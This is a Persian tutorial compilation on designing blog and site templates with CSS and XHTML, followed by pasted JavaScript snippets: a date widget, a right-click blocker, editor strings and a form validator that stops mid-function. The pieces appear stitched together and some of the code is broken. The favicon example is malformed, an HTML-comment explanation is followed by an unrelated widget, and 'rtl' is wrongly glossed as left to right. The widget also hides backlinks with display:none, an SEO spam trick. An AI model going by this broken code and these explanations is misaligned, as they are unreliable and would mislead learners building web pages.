استانداردها صفحاتی که بر اساس xhtml
طراحی شده اند با مرورگرهای مختلف سازگارند. برای کسب اطلاعات بیشتر در مورد قوانین
دسترسی، به این آدرس بروید:
http://www.w3.org/wai
در این سری آموزشی شما می توانید طراحی قالبهای تک ستونه، دو ستونه، سه ستونه، چهار
ستونه، ایجاد
header
و
footer
و همین طور طراحی انواع قالبهای سایت را طبق نیاز و سلیقه خودتان بیاموزید و به
راحتی در این قالبها فارسی بنویسید. این قالبها قابل استفاده برای انواع سیستمهای
وبلاگ و سایت از جمله: ،
movable type
، بلاگدون و ... میباشند و فقط کافیست تا کدهای مورد نظرتان را در میان این کدها و
در جایگاه مورد نظرتان قرار دهید. برای طراحی به یکی از نرم افزارهای ویرایش صفحات
وب مانند
FrontPage
نیاز دارید و همینطور لازم است تا برای آزمایش صفحات ایجاد شده مرورگرهای
intenet
explorer
و
فایر فاکس
را روی سیستم خود داشته باشید اگر مرورگر Opera
هم داشته باشید بی شک طراحی مطمئن تر و کامل تری را خواهید داشت.
بخش دوم آموزش طراحی قالب وبسایت و وبلاگ به
وسیله CSS
شما قصد دارید صفحه ای داشته باشید که در آن ستونهایی مناسب با نیاز تان ایجاد شده
است. مثلا اگر
header
و یک ستون برای نوشتن پستها و یک ستون در کنار ستون پستها به عنوان
side
bar
و برای قرار دادن اطلاعات جانبی مانند آیکون فید، لینک دوستان، آمار بازدید و ... و
همینطور در انتهای ستونها یک ستون کم ارتفاع به عنوان
footer
داشته باشید.
در تصویر بالا شما یک قالب دو ستونه را مشاهده میکنید که علاوه بر دو ستون از یک
header
و یک
footer
نیز برخوردار است پس در اصل در این قالب چهار ستون وجود دارد زیرا بیننده فقط
ستونهای بلند وسط صفحه را به حساب می آورد و میگوید دو ستونه ولی طراح با چهار ستون
سرو کار دارد و
header
و
footer
هم هر کدام یک ستون محسوب می شوند.
در اینجا به یکی از اصلی ترین نکات در
css
می پردازیم و آن نحوه جایگزین کردن ستونها در مکان مناسب خودشان است.
در قسمت یک تصویر شماره دو، یک قالب سه ستونه را مشاهده میکنید. عرض ستون زرد 600
پیکسل است و به علت عرض زیاد یک سطر را به خودش اختصاص داده حالا اگر عرض این ستون
را کم کنیم و به 300 پیکسل برسانیم (قسمت دو تصویر شماره دو) ستون صورتی با عرض 200
پیکسل به طور خودکار به کنار ستون زرد منتقل می شود و ستون سبز هم جای ستون صورتی
را میگیرد و در آخر ستونها به شکلی که در قسمت سه تصویر شماره دو مشاهده می کنید
جایگزین می شود. مهمترین نکته در طراحی
css
تنظیم کردن شکل ظاهری ستونها و قرار دادن آنها در مکان مناسب خودشان است و طبق
توضیحاتی که داده شد به این نتیجه می رسیم که با کم کردن عرض ستونها می توانید
چندین ستون را در یک سطر و در کنار هم قرار دهید و یا با زیاد کردن عرض ستونها هر
سطر را به یکی از آنها اختصاص دهید. میزان فاصله میان یک ستون از ستونهای اطرافش
نیز قابل تنظیم است.
نکته مهم دیگری که در طراحی
css
وجود دارد قانون ظرف و مظروف است. این نکته بدین معناست که هر ستون می تواند
ستونهای دیگری را در خود جای دهد مثلا در تصویر شماره یک، ستوهای قابل مشاهده (header
-
footer - side bar
) در یک ستون کلی تر قرار گرفته اند که به آنها نظم می دهد و باعث می شود تا ترتیب
شان را از دست ندهند. برای توضیح این مسئله در نمونه های دیگر میتوانید در تصویر
شماره یک به ساید بار سمت چپ توجه کنید این ساید بار یا ستون جانبی مکانی است برای
قرار دادن اطلات مازاد یک وبلاگ یا وبسایت، اطلاعاتی مانند لینک دوستان، موضوعات،
آرشیو و ... یعنی شما باید هر کدام از این قسمتها را به طور مجزا از یکدیگر ولی به
صورت منظم و زیر هم در
side bar
قرار دهید. برای این کار باید ستونهای کوچکتری را در ساید بار طراحی کنید که هر
کدام یکی از قسمتهای اطلاعات مازاد وبگاه را در خود جای دهند. در نتیجه ساید بار
سمت چب ظرفی برای نگهداری محتویاتش محسوب می شود.
اگر به
html
عادت کرده باشید می دانید که ننوشتن برخی از کدها (هر چند مهم) به شکل ظاهری
web page
مورد نظر لطمه ای وارد نمی کند ولی رعایت روش صحیح کد نویسی در صفحات
xhtml
اجباریست. مثلا میتوانید قسمت
head
را از یک صفحه
html
حذف کنید بدون اینکه در نمایش آن دچار مشکل شوید ولی
xhtml
اینگونه نیست.
بستن تگها در
xhtml
اجباریست یعنی شما مجبورید کدهای مختلف را با حالت < > و با < /> ببندید حتی تگهای
تکی مانند <em>
و <br>
و موارد مشابه آنها نیز نیاز دارند تا به صورت <br
/> ظاهر شوند. توجه کنید که بعد از کاراکتر ( / )
باید یک فاصله بگذارید و بعد کد مورد نظر را تایپ کنید.
رعایت نوشتن مقادیر خصیصه ها در میان کوتیشن ( " )
در
xhtml
بسیار مهم و ضروریست در صورتی که رعایت نکردن این مسئله در
html
مشکلات زیادی ایجاد نمیکند.
html
به کوچک یا بزرگ بودن حروف عکس العملی نشان نمی دهد ولی در
xhtml
مجبورید همه المان ها، مقادیر و خصیصه های آنها را با حروف کوچک بنویسید.
در ادامه آموزش طراحی صفحات وب استاندارد به کمک
css
امروز یک نوع صفحه پایه ی طراحی
css
که فارسی شده و برای نوشتن مطالب فارسی مناسب می باشد را برای دانلود در اختیارتان
قرار میدهم. با کلیک روی تصویر پایین، آن را دانلود و کار را آغاز کنید.
فایلی را که دانلود کرده اید یک فایل
zip.
است(2-column-no1)
که بعد از
extract
شدن (خارج شدن از حالت
zip
) فولدری را در اختیارتان قرار میدهد که حاوی سه فایل میباشد:
2-column.htm
reset.css
styles.css
فایل اول با پسوند
htm.
همان صفحه اصلی است که در وب به نمایش در می آید. فایل دوم فایل
reset.css
است لطفا برای دریافت اطلاعات در این مورد به این
اینجا
مراجعه کنید. فایل سوم فایل
style.css
است که به صفحه
htm.
دستور میدهد که چگونه محتویاتش را نمایش دهد.
صفحه
htm.
و
styles.css
را که دانلود کرده اید در یک ویرایشگر صفحه وب مانند
frontpage
باز کنید. در حال حاضر صفحه ای مانند تصویر زیر را در اختیار دارید که برای سهولت
در ارائه توضیحات، ستونها را با خطوط (border)
کاملا واضح مشخص کرده ام.
همان طور که قبلا هم توضیح دادم قالبهایی را که مثلا دو ستونه می نامیم مانند قالبی
که هم اکنون برای کار در دست دارید ظاهرا دو ستونه است ولی در اصل با چندین ستون
سرو کار داریم. در این قالب پنج ستون داریم که با تغییرات در ظاهر آنها میتوانیم به
آنچه در نظر داریم نزدیک شده و طرح مورد نظرمان را اعمال کنیم.
اکنون به فایل
styles.css
نگاهی می اندازیم. برای این که به اهمیت این فایل بیشتر پی ببرید ابتدا فایل
htm.
را در مروگر مشاهده کنید سپس فایل
styles.css
را از درون فولدر،
delete
کرده و مجددا فایل
htm.
را مشاهده کنید (اگر صفحه شما در مرورگر باز است آن را
refresh
کنید تا تغیرات را ببینید). برای اطلاعات بیشتر در مورد محتویات
styles.css
اجزای آن را بررسی میکنیم:
شما در این فایل نوشته هایی را مشاهده میکنید که هر کدام مربوط به یک ستون می باشد
در ابتدا باید بدانید که اسامی ستونها در فایل
styles.css
با علامت #
مشخص میشوند. مثلا:
wrapper#
در فایل
styles.css
که در اختیار دارید چگونگی نمایش ستون
wrapper
را در صفحه
htm.
مشخص میکند. کدهای
HTML
صفحه
htm.
را در ویرایشگر خود مرور کنید و نام
wrapper
را بیابید. این ستون، ظرف یا قالب اصلی کار شماست که در صفحه
htm.
آن را برای شما با
border
قرمز مشخص کرده
ام
و بقیه ستونها مانند قطعات پازل در آن جای میگیرند.
نوشته هایی که در میان دو علامت { } قرار
دارند
و زیر نام یک ستون قرار میگیرند دستوارتی هستند که نحوه نمایش آن ستون را اعمال
میکنند. همان طور که در دستور بالا که قسمتی از فایل
styles.css
شماست و متعلق به ستون
wrapper
میباشد مشاهده میکنید به این ستون دستور داده شده تا به حالت اتوماتیک (خودکار) در
صفحه جای بگیرد (
;margin:
auto
)،
نوشته های درون آن از حالت نوشتاری راست به چپ پیروی کنند
که برای نوشتار و تایپ فارسی مناسب است
(
;direction:
rtl
) منظور از مقدار
rtl
که در مقابل کلمه
direction
نوشته شده همان
right
to left
یا چپ به راست است،
عرض آن 922 پیکسل باشد (
;width:
922px
) و
اطراف آن را یک خط ممتد با ضخامت 1 پیکسل و رنگ قرمز احاطه کند (
;border:
1px
solid #FF0000
).
اکنون دستورات ستون دیگری را مرور میکنیم تا کدهای جدیدتری را پیدا کنیم. در فایل
styles.css
به دنبال ستون
leftcolumn
بگردید دستورات این ستون را در قسمت پایین مشاهده میکنید:
کدهای جدیدی که در این قسمت مشاهده میکنید عبارت است از:
background
و
padding
و
height
و
float
.
این کدها به ستون
leftcolumn
دستور میدهند که:
رنگ پس زمینه اش سفید باشد (
;background:#FFFFFF
)،
فاصله محتویات درونش مانند تصاویر عکسها و ... از اطراف 10 پیکسل باشد (
;padding:
10px
)،
ارتفاع آن 350 پیکسل باشد (
;height:
350px
) و
جایگاه قرار گرفتنش در صفحه سمت راست باشد (
;float:
right
).
شما میتوانید با تغییر اندازه
width
(عرض) ستون
wrapper
و ستونهای داخل آن شکل قالب را کاملا تغییر دهید. قصد دارم چند طرح را مشخص کنم تا
افرادی که این سری آموزشی را دنبال میکنند برای تمرین از آن طرح ها به عنوان الگو
استفاده کنند.
برای تمرین، اندازه عرض ستونها را تغییر دهید درست کردن قالبهایی به شکل زیر را
تمرین کنید تغییرات در کدهای اصلی را در قسمت بعد آموزش میدهم.
الگوی شماره یک:
عرض
wrapper
= چهارصد پیکسل (400px)
عرض
header
= سیصدو هفتادو هشت پیکسل (378px)
عرض
leftcolumn
= دویست و چهل و یک پیکسل (241px)
عرض
rightcolumn
= صدو ده پیکسل (110px)
عرض
footer
= سیصدو هفتادو هشت پیکسل (378px)
الگوی شماره دو:
عرض
wrapper
= هشتصد پیکسل (800px)
عرض
header
= هفتصد و هفتادو هشت پیکسل (778px)
عرض
leftcolumn
= دویست و یک پیکسل (201px)
عرض
rightcolumn
= پانصد و پنجاه پیکسل (550px)
عرض
footer
= هفتصد و هفتاد و هشت پیکسل (778px)
الگوی شماره سه:
عرض
wrapper
= هفتصد و پنجاه پیکسل (750px)
بقیه ستونها را خودتان تنظیم کنید به صورتی که عرض ستون سمت چپ بیشتر از راست باشد.
الگوی شماره چهار:
عرض
wrapper
= ششصد پیکسل (600px)
عرض ستون چپ و راست برابر باشد.
کد نمایش برترین مطالب در بالای وبلاگ
در صفحه اصلی مطلب در
وبلاگ CSS3 چهار پنجره کد مشاهده می
کنید محتوای اولین
پنجره کدهای استایل بندی هستند عینا کپی و بدون نیاز به تغییز در بخش ویرایش قالب
به قسمت <style type="text/css"> کپی نمایید و یا اگر از
سایت با هاست شخصی استفاده می کنید فایل style.css را یافته و محتوا را در
آن کپی نمایید بخش دوم هم کدهای
جاوا اسکریپت هستند که هم می توانند در داخل صفحه اصلی قالب بعد از نوشتن <script type="javascript/text"> و </script> کدها را در بین تگ
اسکریپت قرار دهید و هم در صفحه ای جدا با پسوند js ذخیره کنیدیا از پنجره سوم
کد لینک به فایل را برداشته و در قالب وبلاگ یا سایت خود قرار دهید بخش چهارم کدهای
داخل صفحه هستند که در جای مناسب برای نمایش قرار می گیرند شما می توانید رنگ پس
زمینه و نوشته ها و متون را در این کد به راحتی تغییر دهید اما مراقب باشید
ID و
Class ها را
تغییر ندهید.
در صفحه اصلی مطلب در وبلاگ CSS3
چهار پنجره کد مشاهده می کنید
محتوای اولین پنجره کدهای استایل بندی هستند عینا کپی و بدون نیاز به تغییز در بخش
ویرایش قالب به قسمت <style type="text/css">
کپی نمایید و یا اگر از سایت با هاست شخصی استفاده می کنید فایل style.css را یافته و محتوا را در آن
کپی نمایید
بخش دوم هم کدهای جاوا اسکریپت هستند که هم می توانند در داخل صفحه اصلی قالب بعد
از نوشتن <script type="javascript/text">
و </script> کدها را در بین تگ
اسکریپت قرار دهید و هم در صفحه ای جدا با پسوند js
ذخیره کنید یا از پنجره سوم کد لینک به فایل را برداشته و در قالب وبلاگ یا سایت
خود قرار دهید
بخش چهارم کدهای داخل صفحه هستند که در جای مناسب برای نمایش قرار می گیرند شما می
توانید رنگ پس زمینه و نوشته ها و متون را در این کد به راحتی تغییر دهید اما
مراقب باشید ID و Class ها را تغییر ندهید.
همان
طور که می دانید
حجم تعدادی
از کدهای جاوا اسکریپت زیاد
می باشد
و اگه بخواهید
به صورت مستقیم این کدها را
در وب قرار دهید
هر کد می
تواند به
تنهایی
100 سطر از حجم
قالب شما را اشغال کند و
حجم قالب شما را سنگین خواهد کرد.
با
این آموزشی برای شما آماده کردم میتوانید 10 عدد کد جاوا اسکریپت را در کمتر از 10
سطر خلاصه کنید. و سرعت لود وب خود را بالاتر ببرید.
شاید شما هم از آن
دسته افرادی می
باشید
که از کدهای جاوا اسکریپت زیادی
استفاده می کنید و قالب
شما پر از کدهای طولانی می باشد.
برای اینکه این شلوغی را
از بین ببرید
و قالب منظم و خلوتی داشته باشید,
می توانید
کدهای جاوا اسکریپت خود را
به فایلjs.
تبدیل کنید
. سپس فايل جاوا اسکریپت خود را
آپلود کنید و تنها
آدرس کد جاوااسکریپت را
در قالب
خود
قرار دهید
که بیشتر
از یک سطر هم نخواهد
شد.
برای تبدیل کدهای جاوا اسکریپت به فایلjs.
ابتدا کد مورد نظر
خود را در یک برنامه ساده مانند
Notepad
کپی کنید . سپس
از منوی File
گزینه ی ... Save
asرا
انتخاب کنید . فایل را
با پسوند js.
در کامپیوتر خود ذخیره کنید .برای
مثال
linkbox.js. تا
اینجا شما فایل جاوا اسکریپت را ساخته اید .
نکته :
كد جاوا اسکریپت خود را می بایست بدون تگ اول و آخر آن قرار بدید . يعني تگ های
SCRIPT
LANGUAGE=JAVASCRIPT
و scriptرا در
فایل جاوا اسکریپت خود قرار ندید
.
حالا
بايد فایل جاوا اسکریپت خود را در یک سرور و یا آپلود سنتر مطمئن آپلود نمایید
.
تمام
شد.
حالا
کد را در جای مناسبی از وب خود قراردهید .
با این
آموزش و این ترفند قادر خواهید بود کد هایی با حجم بالا را به یک کدیک
سطری تبدیل کنید .
نمو نه
ای از کد را در زیر مشاهده می کنید:
// JavaScript Document
res = "<div style=\"
z-index:1000; position:absolute; right:0px; top:0px; border-width:0px; \">"
res += "<img
src=\"http://www.parstools.com/events/ramezan/Ramazan_3_2.gif\" width=\"170\"
height=\"170\" "
res += "border=\"0\"
usemap=\"#muslims1\" /><map name=\"muslims1\" id=\"muslims1\"> "
res += "<area
shape=\"poly\" alt=\"رمضان ماه ضیافت خدا\"
coords=\"1,1,169,1,169,169\" "
res +=
"href=\"http://www.parstools.com/events\" target=\"_blank\" /></map></div>"
آموزش قرار دادن آيکون اختصاصي سايت خود
(favicon)در
کنار آدرس بار، به جاي آيکون مرورگر:
<HTML>
<Head>
<Title>Admin
Login</Title>
</"
link rel="shortcut icon" href="http://site.com/aks.gif>
<Head/>
گاهی لازم می شود تا برای یادآوری تگی و یا متذکر شدن موردی به برنامه نویسان همکار
جمله ای در سورس صفحه ی سایت نوشته شود.البته همانطور که معلوم است، این جمله نباید
در صفحه طراحی شده سایت نمایش داده شود.در چنین مواقعی از تگ زیر استفاده می شود.
<!-- Start History Code By www.Night-Skin.com --><center><script
type='text/javascript' language='javascript'
src='http://night-skin.com/blogcode/tarikh/date.php?type=1'></script><div
style="display:none"><a href=http://night-skin.com/>سايت خدماتي و هنري نايت
اسکين</a><a href=http://night-skin.com/tools>ابزار هاي وبلاگ نويسي</a><a
href=http://night-skin.com/blogcode/tarikh>نمايشگر تاريخ به صورت
فارسي</a></div></center><!-- End History Code By www.Night-Skin.com -->
//Disable right mouse click Script
//By Maximus (maximus@nsimail.com) w/ mods by DynamicDrive
//For full source code, visit http://www.dynamicdrive.com
var message="راست كليك ممنوع!";
///////////////////////////////////
function clickIE4(){
if (event.button==2){
alert(message);
return false;
}
}
function clickNS4(e){
if (document.layers||document.getElementById&&!document.all){
if (e.which==2||e.which==3){
alert(message);
return false;
}
}
}
if (document.layers){
document.captureEvents(Event.MOUSEDOWN);
document.onmousedown=clickNS4;
}
else if (document.all&&!document.getElementById){
document.onmousedown=clickIE4;
}
document.oncontextmenu=new Function("alert(message);return false")
// -->
</script>
<link rel="stylesheet" type="text/css" id="editor_css"
href="33333333333_files/editor.css">
<script type="text/javascript"><!-- // --><![CDATA[
var smf_smileys_url = 'http://www.3eke.ir/forum/Smileys/yahoo';
var oEditorStrings= {
wont_work: 'مرورگز شما ويرايگشر پيشرفته را پشتيباني نميکند.',
func_disabled: 'مرورگر شما اين عمليات را پشتيباني نميکند.',
prompt_text_email: 'Please enter the email address.',
prompt_text_ftp: 'Please enter the ftp address.',
prompt_text_url: 'Please enter the URL you wish to link to.',
prompt_text_img: 'Enter image location'
}
// ]]></script>
<!-- Start Code ParsTools.com Send to Friend Form-->
<SCRIPT language="JavaScript">
function CheckSFormParstools () {
//Initialise variables
var errorMsg = "";
//Check for a name
if (document.sendfriend.n1.value == ""){
errorMsg += "\n\n\t\t\t !نام شما وارد نشده است";
}
if (document.sendfriend.n2.value == ""){
errorMsg += "\n\n\t\t\t !نام دوست شما وارد نشده است ";
}
//Check for an e-mail address and that it is valid
if ((document.sendfriend.e1.value == "") || (document.sendfriend.e1.value.length
> 0 && (document.sendfriend.e1.value.indexOf("@",0) == - 1 ||
document.sendfriend.e1.value.indexOf(".",0) == - 1))) {
errorMsg += "\n\n\t !آدرس ايميل شما بطور صحيح وارد نشده است ";
}
//Check for an e-mail address and that it is valid
if ((document.sendfriend.e2.value == "") || (document.sendfriend.e2.value.length
> 0 && (document.sendfriend.e2.value.indexOf("@",0) == - 1 ||
document.sendfriend.e2.value.indexOf(".",0) == - 1))) {
errorMsg += "\n\n\t\t !ايميل دوست شما بطور صحيح وارد نشده است";
}
//If there is aproblem with the form then display an error
if (errorMsg != ""){
msg = "\t\t :لطفا فرم ارسال به دوستان را بطور کامل پر نماييد\n";
msg += "___________________________________________________";